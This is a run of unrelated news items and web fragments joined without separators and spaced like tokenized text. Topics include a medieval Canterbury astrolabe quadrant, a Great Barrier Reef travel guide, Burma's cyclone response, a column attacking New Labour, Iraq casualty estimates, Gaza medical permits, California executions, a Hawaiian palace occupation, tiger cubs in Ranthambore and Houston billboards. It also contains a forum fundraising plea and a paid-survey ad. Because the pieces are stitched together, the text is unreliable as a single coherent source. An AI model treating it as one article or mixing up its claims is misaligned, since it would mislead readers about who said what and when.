The quadrant was found in excavations of a series of clay floors on the site of an old inn called the House of Agnes , just outside the city walls of Canterbury in Kent , UK , on the main road to London .
It had lain there for over 600 years .
Conceivably it was lost at the site by a merchant travelling to or from Canterbury , rather like Chaucer ’s pilgrims ( see Scientific treasure found in junk pit ) .
The quadrant was initially put up for sale in 2007 by the auctioneers Bonhams , where it was expected to fetch £ 60,000 – £ 100,000 ( US $ 120,000 – $ 200,000 ) .
But subsequent dealings led to an agreed sale at a price of about £ 350,000 ( the buyer has n't been publicly disclosed ) .
Because of the perceived cultural importance of the object , however , it was considered by the United Kingdom ’s Reviewing Committee on the Export of Works of Art and Objects of Cultural Interest , which recommended to the government ’s culture minister Margaret Hodge that granting of an export licence should be delayed until June 2008 , giving time for the British Museum to try to buy the instrument for its forthcoming new Medieval Gallery .
Such decisions are usually applied to works of fine art , not to scientific items , says Jim Bennett , director of the Museum of the History of Science in Oxford , who was an expert witness for the reviewing committee .
The British Museum is now trying to raise the £ 350,000 needed to match the offer .
Sweet simplicity
Most surviving astrolabes are larger and more complex , including other functions such as astrological calculations .
Their use tended to be highly specialized , confined mostly to academic settings .
A quadrant astrolabe kept in the library of Merton College in Oxford , for example — one of the few other examples of this design — is considerably more elaborate and geared for academic use .
In contrast , the new quadrant is a simple , everyday item — the kind of thing a cleric or a merchant would have carried with them for convenient time - keeping .
All the same , says Bennett , “ you had to know some astronomy to work one of these devices ” .
He adds that it has design features that would appeal to medieval gadget freaks , such as a moveable eagle that indicates the date of Easter .
ADVERTISEMENT
Most intriguingly of all , the Canterbury quadrant has been dated to the time of Geoffrey Chaucer : specifically to about 1388 , just around when Chaucer began to write his Canterbury Tales .
Chaucer was highly informed about astronomy and astrology , and in 1391 he wrote a treatise on the astrolabe that became the standard reference text for several centuries .
The existence of this simple , practical device sheds new light on Chaucer ’s treatise : it supports the idea that Chaucer ’s work was a piece of popular science writing , understandable to more than just the elite .
“ It suggests that this kind of knowledge was n’t too arcane or academic , ” says Bennett .
The British Museum has until June to come up with the money needed to buy the device and prevent a private sale .
A curator from the museum was unable to comment on the status of the fund - raising while it is still in progress .
25 shares Share
Tweet
Pin
Pocket
Flipboard
It ’s hard to truly grasp the size Great Barrier Reef from the surface of the Earth .
Unless you ’re in a jumbo jet flying over the reef at 30,000 feet , you ca n’t see how big it is , and even in a jet , you can only see a fraction of it .
The reef stretches a massive amount of Australia ’s East Coast , and you can access the reef from several locations in Queensland .
I went diving in the Whitsunday Islands off Airlie Beach and in Cairns .
I also had the chance to do some real underwater photography with my camera .
If you visit Australia with the idea of standing on a hill and taking in the majesty of the Great Barrier Reef — forget it .
You ca n’t see it from shore in most places .
You ’ll need to take at least an hour - long boat ride to get out to the reef .
That ’s precisely why most travelers visiting the Great Barrier Reef go on an organized snorkeling or diving trip .
Overview
The Great Barrier Reef needs no introduction .
It ’s a natural site listed as one of the UNESCO World Heritage Sites in Australia after it was inscribed into the list in 1981 .
It is the largest coral reef system in the world , with more than 2,900 individual reefs and 900 islands .
The reef belongs to Coral Sea in Queensland , Australia .
It is also the largest single living structure in the world , if you ’ve read the fun fact that it ’s visible from outer space — you ’re right !
Meanwhile , it is also recognized by the Queensland National Trust as the state ’s icon .
A large percentage of the reef system belongs to the Great Barrier Reef Marine Park .
This park was established to limit the impact of human use and contact with the living organisms in the island ( which is inevitable due to the tourism industry ) .
Some of the current threats to the reef system include coral bleaching , runoff , and cyclic population outbreaks of starfish .
A study published by the Proceedings of the National Academy of Sciences revealed that since 1985 , over half of the corals had been lost at the Great Barrier Reef .
Hence , conservation efforts had been tight in order to preserve what is left of the corals .
From the World Heritage inscription for the Great Barrier Reef :
As the world ’s most extensive coral reef ecosystem , the Great Barrier Reef is a globally outstanding and significant entity .
Practically the entire ecosystem was inscribed as World Heritage in 1981 , covering an area of 348,000 square kilometers and extending across a contiguous latitudinal range of 14o ( 10 oS to 24oS ) .
The Great Barrier Reef includes extensive cross -shelf diversity , stretching from the low water mark along the mainland coast up to 250 kilometers offshore .
This wide depth range includes vast shallow inshore areas , mid-shelf , and outer reefs , and beyond the continental shelf to oceanic waters over 2,000 meters deep .
Within the Great Barrier Reef , there are some 2,500 individual reefs of varying sizes and shapes , and over 900 islands , ranging from small sandy cays and larger vegetated cays to large rugged continental islands rising , in one instance , over 1,100 meters above sea level .
Collectively these landscapes and seascapes provide some of the most spectacular maritime scenery in the world .
The latitudinal and cross -shelf diversity , combined with diversity through the depths of the water column , encompasses a globally unique array of ecological communities , habitats , and species .
This diversity of species and habitats and their interconnectivity make the Great Barrier Reef one of the richest and most complex natural ecosystems on earth .
There are over 1,500 species of fish , about 400 species of coral , 4,000 species of mollusk , and some 240 species of birds , plus a great diversity of sponges , anemones , marine worms , crustaceans , and other species .
No other World Heritage property contains such biodiversity .
This diversity , especially the endemic species , means the GBR is of enormous scientific and intrinsic importance , and it also contains a significant number of threatened species .
At the time of inscription , the IUCN evaluation stated “… if only one coral reef site in the world were to be chosen for the World Heritage List , the Great Barrier Reef is the site to be chosen ” .
Basic Facts About Great Barrier Reef
Here are some interesting facts you need to know about the Great Barrier Reef :
The Great Barrier Reef is the largest living structure in the planet .
It is also rich and diverse in terms of life .
The Great Barrier Reef stretches to 2,300 kilometers in length and can be seen from the outer space .
Some of the animal species that are living within the Great Barrier Reef have been around since prehistoric times and have changed little over time .
These include crocodiles and turtles .
The vast expanse of the Great Barrier Reef features diverse ecological communities , species and habitats .
The reef system , however , is the most complex in the world and it ’s this that brought the reef the most fame .
That said , the reef system only consists 70 % of the total area covered by the World Heritage Site .
The Great Barrier Reef Marine Park consists of different zones , with each zone having its own set of rules for protecting and preserving the natural resources .
The marine creatures that thrive in the Great Barrier Reef can be broken down as follows : 600 soft and hard corals , 300 varieties of molluscs , over 100 species of jellyfish , 133 varieties of rays and sharks , over 30 species of whales , and more than 1,600 types of fish .
Underwater at the Great Barrier Reef , admiring the diverse and unique coral .
Getting to the Great Barrier Reef
If you want to visit the Great Barrier Reef , the best place to start your journey is Cairns .
This is the preferred jump - off point for most tourists because there are plenty of sights and activities within Cairns itself .
For international visitors , you can take international flights directly to Cairns International Airport .
You can also take direct flights into the islands on the reef , such as the Great Barrier Reef Airport on Hamilton Island .
From Hamilton Island , you can choose to take a plane or boat in order to visit the Great Barrier Reef and other neighboring islands .
Great Barrier Reef Travel Tips
Planning a trip to the Great Barrier Reef ?
Here are some guidelines and insider travel tips to help you make the most of your time :
The best time to visit the Great Barrier Reef is during the months of late March to early June .
It is BIG !
You wo n’t be able to cover the 132,000 + square miles that it encompasses .
Hence , you need to plan your itinerary based on the activities you wish to do ( snorkeling , swimming , or diving ) or the attractions you want to explore .
If you are going to dive at the reef , make sure to bring your underwater camera so you can capture the beautiful marine life and coral system .
Always abide by the environmental guidelines and responsible reef practices to aid in the conservation and preservation of the reef system .
The best way to get around the Great Barrier Reef is by boat or car .
If you are planning to spend most of your time on the mainland , renting a car is a good idea .
But renting a boat is a good option if you want to explore remote islands , such as Lizard or Whitsunday Islands .
WASHINGTON - Laura Bush condemned the military government in Burma yesterday for its " inept " response to a deadly weekend cyclone , marking an unusual foray by the president 's spouse into a high - profile foreign policy crisis .
Appearing at a White House news conference , Laura Bush said the military junta in Burma is preventing the United States and other nations from providing help after Tropical Cyclone Nargis , and also alleged that the country 's rulers purposely declined to warn people of the impending danger .
" Although they were aware of the threat , Burma 's state - run media failed to issue a timely warning to citizens in the storm 's path , " she said .
" The response to this cyclone is just the most recent example of the junta 's failures to meet its people 's basic needs . "
Bush also urged the Burmese regime to cancel plans for a referendum later this week , which she said would " give false legitimacy to their continued rule . "
The remarks underscore the first lady 's uncommon emergence as the administration 's most visible spokesperson on Burma , which is ruled by a junta that is widely criticized as one of the world 's most oppressive and corrupt regimes .
The news conference marked the first time that she presided at the White House briefing room , which is generally used for official pronouncements by President Bush or his senior aides .
Laura Bush told reporters that her deep interest in Burma was sparked by reading the works of Nobel Peace Prize laureate Aung San Suu Kyi , who is under house arrest and has spent 12 of the last 18 years in some form of confinement .
She said the president would sign legislation today awarding Suu Kyi the Congressional Gold Medal .
Bush said awarding Suu Kyi the gold medal will " let the people of Burma know that the United States is standing with them . "
White House and State Department officials said the US Embassy in Burma has authorized an emergency release of $ 250,000 for humanitarian aid , but further efforts have been stymied by the refusal of the military junta to allow outside access to the country .
US State Department spokesman Tom Casey said that a disaster response team was " standing by and ready to go into Burma " but that " the Burmese government has not given them permission to go into the country . "
The European Union has pledged $ 3 million in aid for Burma .
Bush said the United States was preparing to offer " substantial " assistance , but officials have not settled on an amount .
© Copyright 2008 Globe Newspaper Company .
You can hear the wringing of hands and tearing of cloth all the way down Farringdon Road .
Dismayed by the local election results , convinced that Labour will be crushed in Thursday 's byelection , afraid that this will presage disaster in the next general election , my fellow columnists are predicting the end of the civilised world .
But I can't understand why we should care .
Yes , I worry about what the Tories might do if they get in .
I also worry about what Labour might do if it wins another term .
Why should anyone on the left seek the re-election of the most rightwing government Britain has had since the second world war ?
New Labour 's apologists keep reminding us of the redistributive policies it has introduced : Sure Start children 's centres , reductions in child poverty , raising the school leaving age , the national minimum wage , flexible hours for parents and carers , better conditions for part - time workers , the decent homes programme , free museums , more foreign aid .
All these are real achievements and deserve to be celebrated .
But the catalogue of failures , backsliding and outright destruction is much longer and more consequential .
One fact alone should disqualify this government from office : we have a cabinet of war criminals .
The Nuremberg tribunal characterised a war of aggression as " the supreme international crime " .
It is not just that Britain 's Labour government launched and sustained an unprovoked war , it also sabotaged all means of achieving a peaceful resolution .
In April 2002 it helped the Bush administration to sack José Bustani , the head of the Organisation for the Prohibition of Chemical Weapons , in order to prevent him settling the dispute over Iraq 's alleged weapons of mass destruction .
In two separate offers before the invasion , Saddam Hussein agreed to meet the terms the US and Britain were demanding .
But they slapped him down and concealed his offers from their electorates .
( All references are on my website . )
Cluster bombs can be legally used because the British government helped to block an international ban in 2006 : it is still holding out against an outright ban at the current talks in Dublin .
The government has undermined another international peace agreement - the nuclear non-proliferation treaty - by deciding to renew the Trident missile programme .
It was the first administration to announce a policy of pre-emptive nuclear attack : even the great nuclear enthusiast Harold Macmillan never went this far .
In 2007 the defence secretary , without parliamentary debate , revealed that the US would be allowed to use the listening station at Menwith Hill for its missile defence system .
Labour appears to be prepared to meet any demand the Bush administration makes , however outrageous .
In 2003 the government signed a one - sided extradition treaty , permitting the US to extract our citizens without producing prima facie evidence of an offence .
In the same year the defence secretary announced that he would restructure the British armed forces to make them " inter - operable " with those of the United States , ensuring for the first time in British history that they became functionally subordinate to those of another sovereign power .
Labour 's foreign policy is as unethical as Margaret Thatcher's .
It provides military aid to the government of Colombia , whose troops are involved in a campaign of terror against the civilian population .
It granted an open licence for weapons exports to the government of Uzbekistan , and sacked the British ambassador when he tried to draw attention to the regime 's human rights abuses .
It has collaborated with the US programme of extra-judicial kidnapping and imprisonment , left our citizens to languish in Guantánamo Bay , and made use of Pakistani torture chambers in seeking to extract testimony from British suspects .
Until 2005 it tied its foreign aid programme to the privatisation of public utilities in some of the world 's poorest countries .
Last year it held out against reform of the International Monetary Fund 's unfair allocation of votes .
The proportion of the British population in prison has risen by a fifth since the Tories left office .
Today Britain locks up 151 out of every 100,000 people .
The Chinese judiciary , by contrast , which is notorious for its willingness to bang up anyone and everyone , jails 119 people per 100,000 ; Burma imprisons 120 ; Saudi Arabia 132 .
The Serious Organised Crime and Police Act , passed in 2005 , contains clauses that permit the police to ban any demonstration , however peaceful .
It is one of a long series of bills the Labour government has passed that restrict the right to protest .
The citizen has been re-regulated ; business has been deregulated .
Last year deaths caused by serious injuries at work rose by 11 % : a predictable result of the sacking of 1,000 staff at the Health & Safety Executive and a 24 % reduction in workplace inspections .
In 2006 the government instructed the Serious Fraud Office to drop its corruption case against the arms manufacturer BAE Systems .
It has obstructed efforts by other states to investigate the company .
Labour has shifted taxation from the rich to the poor , cutting corporation tax from 33 % to 28 % and capital gains tax from 40 % to 18 % , and introducing a new entrepreneurs ' relief scheme , taxing the first million of capital gains at just 10 % .
It tried to raise the income tax paid by the poorest earners from 10 % to 20 % .
Labour has lifted the inheritance tax threshold from £ 300,000 to £ 700,000 , and maintained the cap on the highest rates of council tax .
While vigorously prosecuting benefits cheats , it has allowed tax avoidance , mostly by the very rich , to reach an estimated £ 41 bn .
Inequality today is slightly worse than it was when Labour took power in 1997 ( the Gini coefficient which measures it has risen from 0.33 to 0.35 ) .
Both as chancellor and prime minister , Gordon Brown has forced the private finance initiative into almost all public services .
His privatisation schemes have crept into places where the Conservative government never dared to tread .
Labour has waged war against our planning system and overseen a disastrous decline in social housing : under Thatcher an average of 46,600 social homes were built every year ; under Tony Blair the average was 17,300 .
Labour is closing post offices , small schools and GPs ' surgeries , while overseeing a doubling of airport capacity and the construction of 4,000 km of trunk roads .
These developments ensure that even the modest targets in the climate change bill are likely to be missed .
Carbon dioxide pollution fell faster under the Conservatives than under Labour .
Above all , the Labour government has destroyed hope .
It has put into practice Thatcher 's dictum that " there is no alternative " to a market fundamentalism that subordinates human welfare to the demands of business .
Labour has created a political monoculture that kills voters ' enthusiasm , and has delayed electoral reforms that would have given smaller parties an opportunity to be heard .
All we are left with is fear : the fear that this awful government might be replaced by something slightly worse .
Fear has destroyed the Labour party , but people keep supporting it in trepidation of letting the other side win .
Save this government ?
I would sooner give money to the Malarial Mosquito Conservation Project .
Of all the causes leftist thinkers might support , New Labour must be the least deserving .
monbiot.com
During the last two minutes or so of his interview with David Letterman Tuesday night , John McCain got asked some tough questions , including one about the grotesque number of Iraqis killed or displaced because of his Bush 's War .
Letterman : 4,000 American men and women soldiers dead since we went into Iraq .
Another 30,000 wounded .
Untold Iraqis dead .
We rarely hear that number .
What would that number be ?
A quarter of a million ?
Half a million ?
McCain :
It 's hard to make these estimates , but it's in the hundreds of thousands , obviously .
Download Download ( :30 )
Estimating the number of Iraqi casualties , as horrific as that sounds , is extremely difficult to pinpoint given the chaotic nature of the country .
The Iraq Body Count website puts the number at anywhere between 82,625 and 90,149 .
Other estimates , including one conducted by prestigious medical journal The Lancet in 2006 , puts the number at around 600,000 .
Still others estimate as high as 1,194,935 .
And of course we can't discount the 2 million refugees .
No matter which figure you choose to believe , we can all agree that there are far too many lives irredeemably shattered by this senseless and endless war .
A Palestinian father of six who was diagnosed with a brain cancer died at Gaza 's Shifa Hospital on Wednesday while waiting for an entry permit to Israel , where he was set to undergo brain surgery and receive chemotherapy treatment at Ichilov Hospital in Tel Aviv .
UN Health Organization WHO : Dozens die in Gaza because of delayed Israeli medical permits News agencies UN 's health organization says that while Israel is letting in unprecedented number of Palestinian patients for care , lengthy period required for background security checks result in needless deaths .
Top Israeli coordinator rejects claim , cites cases in which Palestinians have used illnesses as pretext to carry out bombings
WHO : Dozens die in Gaza because of delayed Israeli medical permits
Three weeks ago , at the request of Physicians for Human Rights - Israel ( PHR - Israel ) , Dr Elsalam Abria of Haifa 's Rambam Hospital wrote an opinion saying that Muhammad el - Harani would die within a few days or weeks unless he receives proper treatment in Israel .
Ran Yaron , co-director of PHR - Israel 's Occupied Territories Project , said that after el - Harani was diagnosed with cancer last February he was referred to Ichilov Hospital to undergo brain surgery and chemotherapy treatment , which are not conducted in any medical center in Gaza .
El - Harani's request was rejected for security reasons , prompting PHR - Israel to file an urgent appeal on his behalf to the IDF 's District Coordination Office .
El - Harani's hearing , which was scheduled to take place at the Erez Crossing at the beginning of the week , was postponed by the army .
" The Shin Bet is continuing its harmful policy against cancer patients , " Yaron said , " we are very concerned for the fate of 12 others who have requested entry to Israel for treatment . "
Only one Gazan cancer patient received clearance to enter Israel for treatment since
Ynet published its report on the affair about a week ago .
Eight other patients have been denied entry .
In March five cancer patients died in Gaza while waiting for entry permits to Israel .
Hi , Folks -
Raye posted on Monday :
help !!!
I need $ 700.00 More Dollars to pay for the server
Rayelan -- Monday , 27 - May - 2019 14:49:54
Looks like about $ 200 has come in since then ; thanks , folks . :)
But let 's keep going , those who are able :
http://fnd.us/21Uvj8
Blessings .
-- hobie
Despite a top prosecutor ’s prediction that executions could resume this year in California -- at a rate of one a month -- the state still faces significant legal hurdles before it can send more inmates to their deaths , legal experts said Wednesday .
Chief Assistant Atty . Gen. Dane Gillette said the U.S. Supreme Court ruling upholding Kentucky ’s use of lethal injection should help persuade a federal judge to end the state ’s two - year moratorium on executions .
Gillette has defended California ’s lethal - injection procedure against the federal court challenge that triggered the moratorium .
Resuming executions this year “ means a lot of things falling our way , but I think that is entirely possible , ” Gillette said .
Defense lawyers were skeptical .
Advertisement
In addition to the challenge pending in federal court in San Jose , a state appeals court is reviewing a ruling that California broke the law by failing to seek public comment on new procedures for carrying out the death penalty .
“ There ’s a lot for the state of California to consider before they can schedule Christmas executions , ” said David Senior , a lawyer for death row inmate Michael Morales , whose challenge of lethal injection is pending before U.S. District Judge Jeremy Fogel .
Senior noted that the state court case could eventually be appealed to the California Supreme Court , delaying executions further .
If the state lost , it would be forced to submit its execution procedures for public comment before anyone could be put to death , Senior said .
Santa Clara University law professor Ellen Kreitzberg agreed that the challenges “ certainly are not going to be resolved quickly . ”
Advertisement
She said Fogel still could hold extensive hearings on California ’s execution practices .
When Fogel struck down the state ’s previous execution protocol , he found problems with six of 13 executions .
The problems focused on doubts that inmates had been properly anesthetized before they were paralyzed and then killed .
“ So that fact does n’t go away ” just because the Supreme Court upheld Kentucky ’s lethal - injection methods , she said .
Although Kentucky and California use the same three drugs to put inmates to death , the California challenge has produced substantial evidence that officials monitor executions inadequately , she said .
“ I think the state still has a fair showing they are going to have to make to Judge Fogel about how they are going to administer these drugs and how they are going to monitor to make sure every inmate is properly anesthetized , ” Kreitzberg said .
Advertisement
But Kent Scheidegger , legal director of the Criminal Justice Legal Foundation , a victims rights group , said Fogel would be “ hard - pressed ” to continue the moratorium after Wednesday ’s high court decision .
More than 650 people are on California ’s death row .
Gillette said five inmates have completed their appeals and can be executed as soon as the courts resolve the litigation .
Fogel ruled in December 2006 that lethal injection in California violated the constitutional ban on cruel and unusual punishment .
He said executions were performed in a dark , cramped room by men and women who knew little about the drugs they administered .
In response to that ruling , the state revised its execution protocol and built a new death chamber .
Advertisement
A hearing before Fogel is scheduled in June .
The state ’s last execution was of Clarence Allen in January 2006 .
A month later , state officials , in a dramatic 11th - hour turnaround , called off the execution of Morales , who has been on death row for more than 20 years for the murder of Lodi teenager Terri Winchell .
--
maura.dolan@latimes.com
U.S. Secretary of State Condoleezza Rice smiles during U.S. President George W. Bush and Croatian President Stjepan Mesic 's joint dinner in Zagreb April 4 , 2008 .
REUTERS / Nikola Solic
WASHINGTON ( Reuters ) - U.S. Secretary of State Condoleezza
Rice left slightly open the chance on Tuesday that she might be interested in running as vice president on Republican White House contender John McCain ’s ticket .
Pressed by a reporter , Rice declined to make a strong , direct rejection that she would never be interested in the second spot on the Republican ticket that is almost certain to be led by McCain as the presidential candidate .
Rice chose instead to lavish praise on the Arizona senator , adding that at the end of the Bush administration in January 2009 she planned to go to her home in California where she had served as provost at Stanford University .
“ Senator McCain is an extraordinary American , a really outstanding leader and obviously a great patriot , ” Rice said at a news conference with the foreign ministers of Mexico and Canada at her side .
“ That said , I am going back to Stanford .
I am going back to California , ” she said , when asked to make a “ Shermanesque denial ” and rule out talk of any political ambitions .
American Civil War Gen. William Tecumseh Sherman famously said when asked if he was being considered as a possible Republican candidate for the presidential election of 1884 : “ If drafted , I will not run ; if nominated , I will not accept ; if elected , I will not serve . ”
Rice ’s unusual appearance last month at a conservative anti-tax lobbying group meeting fueled talk that she was courting her party for a shot at the No. 2 spot and political blogs have been buzzing in recent days with that possibility .
Rice , who has said many times she does not “ do politics , ” said she was extremely busy as the top U.S. diplomat , pointing to a handful of phone calls she had made by mid-morning on Tuesday with Palestinian President Mahmoud Abbas , Pakistan ’s new foreign minister and U.N. Secretary General Ban Ki-moon .
“ I very much look forward to watching this campaign and voting as a voter , ” she said .
Damn , we do n't normally do too much media - on - media stuff , but reports are surfacing that tech mega- publisher Ziff Davis ( owner of PC Mag , EGM , DigitalLife , etc. ) is fricking filing for chapter 11 bankruptcy as a shield from some $ 225 m in debt .
For those not in the know , chapter 11 just means they 're down , but not necessarily out -- although we had no idea it was as dire for the media company as being $ 225 m in the can ( not that we 're really all that shocked ) .
Apparently when the company anticipates emerging from bankruptcy later this summer it 'll have whittled down its debt to under $ 60 m , having given up nearly 90 % of the company 's equity to its private creditors .
( CNN ) --
A group of native Hawaiians occupied the grounds of the old Hawaiian monarchy 's royal residence Wednesday , vowing to stay and do the business of the kingdom 's government .
" It is through a greater realm than ours " that the group took this action , said Mahealani Kahau , elected leader of the group , called Hawaiian Kingdom Government .
" Today and every day , we will be here to assume our role . "
The group is one of several in Hawaii that reject statehood and seek to return to the constitutional monarchy that effectively ended in 1893 when a group of politicians , businessmen and sugar planters -- aided by the U.S. minister to Hawaii -- overthrew the kingdom 's government .
The monarchist groups say the kingdom was overthrown and annexed into the United States illegally .
Hawaii's office of the attorney general did not immediately return a phone call seeking comment on Wednesday 's action .
The staff of Iolani Palace , built in 1882 and now operated as a museum , shut down the building to visitors .
The 60 or so protesters occupied the grounds , chaining the gates and stationing guards there to explain to visitors the purpose of the action .
The group later reopened the gates , but remained on the grounds and the building was kept closed .
" It saddens my heart to have to turn away visitors , " said palace staff member Cindy Ascencio , who added that although she is a native Hawaiian , she does not understand the actions of the group .
Ascencio also said the group appeared peaceful and she was not concerned about security .
Jose Carrion , a visitor to Hawaii from Puerto Rico , told Honolulu 's KHON - TV that he was disappointed he would n't be able to visit the ornate palace and " learn about the culture of the Hawaiians . "
" We wanted to come here precisely because we thought we 'd learn something about the history of Hawaii and the last queen and the monarchy , " said Carrion , who said he had reservations for the visit .
" But we 're leaving tomorrow , so we wo n't get to see the palace . "
Carrion also said he " kind of understood " the actions of the group .
Puerto Rico and Hawaii , along with Guam and the Philippines , were annexed into the United States in 1898 after the Spanish - American War. Guam and Puerto Rico remain territories of the United States .
The Philippines gained independence after World War II , and Hawaii became the 50th state in 1959 .
Although the monarchy was not overthrown until 1893 , its fate effectively was sealed six years earlier when the same group that forced the overthrow imposed a new constitution on King David Kalakaua , who was forced to sign it under threat of arms .
The document dramatically reduced the authority of the monarchy and instituted voter requirements that limited voting to wealthy businessmen and Hawaiian landowners , barring 75 percent of the native Hawaiian population and all Asians .
When Queen Lili'uokalani ascended the throne after the death of her brother in 1891 , she began work on a new constitution that would have effectively reversed the 1887 document .
With the help of John L. Stevens , the U.S. minister to Hawaii , the elite group that had changed the constitution in 1887 opposed the queen 's actions .
Two years later , under threat of U.S. troops , she yielded her authority , saying , " Until such time as the government of the United States shall ... undo the action of its representative and reinstate me in the authority which I claim as the constitutional sovereign of the Hawaiian Islands . "
The queen was later imprisoned in Iolani Palace for eight months for her participation in an attempted 1895 revolt , until she relinquished her claim to the throne in return for her release .
She died in 1917 at 79 .
In 1993 , the U.S. Congress approved , and President Bill Clinton signed , an apology to the people of the Hawaiian islands .
The document " acknowledges that the overthrow of the kingdom of Hawaii occurred with the active participation of agents and citizens of the United States and further acknowledges that the native Hawaiian people never directly relinquished to the United States their claims to their inherent sovereignty as a people over their national lands , either through the kingdom of Hawaii or through a plebiscite or referendum . "
Although it was used as a seat of government for decades after Lili'uokalani 's reign , the palace fell into disrepair .
When the last of the government offices moved out and into new facilities adjacent to the palace in 1969 , restoration work began .
It opened to the public in 1978 .
E-mail to a friend
All About Hawaii • Honolulu
The proteins that domesticated our genomes EPFL scientists have carried out a genomic and evolutionary study of a large and enigmatic family of human proteins , to demonstrate that it is responsible for harnessing the millions of transposable elements in the human genome .
The work reveals the ...
Study links altered brain chemistry , behavioral impairments in fish exposed to elevated CO2 Study Links Altered Brain Chemistry , Behavioral Impairments in Fish Exposed to Elevated CO2 Research team studied damselfish behavior and physiology under ocean acidification conditions predicted for year 2300
Water helps assembly of biofibers that could capture sunlight
When it comes to water , some materials have a split personality - and some of these materials could hold the key to new ways of harnessing solar energy .
Astronomers observe star reborn in a flash
An international team of astronomers using Hubble have been able to study stellar evolution in real time .
Over a period of 30 years dramatic increases in the temperature of the ...
Manipulation of liquid crystals could help control drug - delivery process Liquid crystals are strange substances , both fish and fowl .
They can flow like a liquid , but have the orderly molecular structure of a crystalline solid .
And that internal structure can ...
First accurate simulation of a virus invading a cell
For the first time , scientists know what happens to a virus ' shape when it invades a host cell , thanks to an experiment by researchers at Penn State College of Medicine ...
Chemists offer enhanced 3 - D look inside batteries A team of chemists has developed a method to yield highly detailed , three - dimensional images of the insides of batteries .
The technique , based on magnetic resonance imaging ( MRI ) , offers an enhanced ...
Trees recognize roe deer by saliva
In spring , the young , delicate shoots in the forest light up , bright and May green .
The buds and shoots are the future of the forests as they allow young trees ...
App vs. website :
Which best protects your privacy ?
That 's the ques­tion that North­eastern researchers , led by assis­tant pro­fessor David Choffnes , ask in new research that explores how free app - and web - based ser­vices on Android and iOS mobile ...
She was never on time to clinic appointments .
Leaving her apartment was not simple when it required pushing aside the furniture she had pushed against the front door the night before , and even the furniture was no protection against the threats she perceived .
She said strange men burrowed into the apartment after dark , right through the door , the chest of drawers and the armchairs .
They entered her body , and then they ate her up from the inside .
It took years before she told us this .
We might doubt her , but she knew it happened .
Numerous expensive antipsychotics made no difference at all .
She smoked heavily , partly from anxiety and partly because , like many chronically institutionalized patients , she had been bribed into placidity with cigarettes years earlier .
Before her first psychotic break , she had been a singer .
Smoking was not good for her voice , of course , but under these harrowing circumstances , quitting was impossible .
- video encodings still in process -
Interview with Robert Rodriguez where he discusses the major international news stories that have gone overlooked in the US because of your government 's total preoccupation with the Middle East .
An anonymous reader brings us IBM Developerworks ' recent analysis of how the NSA built SELinux to withstand attacks .
The article shows us some of the relevant kernel architecture and compares SELinux to a few other approaches .
We 've discussed SELinux in the past .
Quoting :
Only 32 tigers were reported in the park 's last census
Fourteen tiger cubs have been spotted in a reserve in north - western India , forestry officials say .
The sightings are a rare piece of good news in the fight to halt the steep decline in tiger numbers in India .
Forestry officials in Ranthambhore National Park in Rajasthan say the cubs are from several mothers and have been seen regularly in recent months .
Ranthambore had just 32 tigers at the last count .
India is thought to have 1,500 tigers , half the world 's total .
But conservationists say they face extinction unless urgent action is taken to save them .
' Positive development ' Ranthambore has seen tiger numbers fall from 46 in 2004 .
The park authorities are currently conducting a new tiger census and up - to - date figures - which will include the new cubs - are expected in June .
RS Shekhawat , deputy field director at Ranthambore , said the sightings of the cubs was " good news for all of us " .
" Credit goes to both governments - state and federal , the forest authorities and also local people for this positive development , " he told the BBC .
Ranthambore covers 392 sq.km . of dry deciduous forests sprawling over undulating terrain .
The BBC's Narayan Bareth in Jaipur says forest officials want more space for the tigers .
" We are contemplating expanding the habitat area for the tiger population because the population is on the rise , " Mr Shekhawat said .
Nearly 100 villages surround the park , and the more the tiger population grows the more they are likely to come into conflict with humans .
The Wildlife Trust of India 's state co-ordinator , Mahendra Kachhawa , urged the authorities to tighten security at the park .
" You know the park is an easy target for the poachers , " he told the BBC .
Tiger taskforce Rajasthan 's state government is under pressure from the Indian government to take steps against poachers .
It is fantastic news and new cubs means the habitat is good and conditions ideal in Ranthambore for breeding
Sujoy Banerjee ,
WWF - India 's Species Conservation Programme
In 2005 it was reported that tigers had been wiped out at another park in Rajasthan , the Sariska sanctuary .
That prompted the setting up of a tiger taskforce in India .
Wildlife experts welcomed the latest news , saying they also had information about sightings of tiger cubs in other reserves .
" Ranthambore is back to its heyday of the 1980s , and the secret of success is in better management and a lot of protection , which was not there earlier , " Belinda Wright of the Wildlife Protection Society of India ( WPSI ) told Reuters news agency .
" We at least know that tigers do n't breed when they are disturbed .
A lot of hard work has gone into Ranthambore and the results are just starting to show now . "
Ranthambhore is a major tourist attraction , drawing about 200,000 people from India and abroad every year .
" We are so happy the 14 tiger cubs were spotted in the park .
It will set an example for the other parks .
It will boost the local economy , " said Arvind Jain , a local hotelier .
E-mail this to a friend Printable version Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
Paid Surveys Review : Get Paid For Your Opinion ....
We have done all the homework for you .
After analyzing various survey sites , we have selected these top 6 as the best paid survey sites .
Houston , Clear Channel reach deal to pull 831 billboards
Mayor flips the blight switch
Ad firm agrees to tear down 831 billboards in city
The city has struck a deal with one of the largest outdoor advertising companies in Houston that calls for it to dismantle 831 billboards before the end of this year .
The agreement with Clear Channel Outdoor would take effect after the City Council approves it .
The proposal is on Wednesday 's agenda .
Under the settlement , Clear Channel would remove 831 small and medium - sized billboards from across the city , 51 of them from designated " scenic districts . "
That represents a two - thirds reduction of all the company 's billboards that are less than 288 square feet in size
Many of those billboards were slated to come down by 2013 , but some could have remained up permanently because they are located on federal roadways and are beyond the city 's legal reach .
In return , Clear Channel would get an extension on 24 large billboards that would have come down between 2009 and 2013 .
Those will get to stay up 20 more years .
The last ones will come down in 2033 .
" I think that 's worth it , " Mayor Bill White said Monday .
" It takes down more billboards faster . "
Anti-billboard activists said they approved of the deal .
" We were very pleased , " said Ed Wulfe , a board member with Scenic Houston .
The nonprofit advocates for beautification of streets and public spaces .
" For all practical purposes , it will mean no new billboards . "
The group had blasted White for offering a " relocation " provision in its previous settlement offer last December .
That would have given Clear Channel the right to move 466 medium billboards .
That was the same as allowing new billboards to be built , the group contended .
Allows attrition to work
Attorneys for Clear Channel could not be reached Monday .
Wulfe said it was more palatable to extend the lifespan of 24 large billboards than to let 466 billboards move about the city .
" I'm OK with it because it was the trading chip that got , as far as we 're concerned , the opportunity to limit relocations to almost nothing , and once and for all , " Wulfe said .
Now , billboards can be relocated only if government condemns the property for a road widening or other project , Wulfe said .
Visual blight opponents say that was important because it allows attrition to work on the billboard population :
They 'll decrease over time from lease expirations , new development , market downturns and weather .
Michael " Mack " Fowler , on the steering committee of the Quality of Life Coalition , said he was pleased with the change .
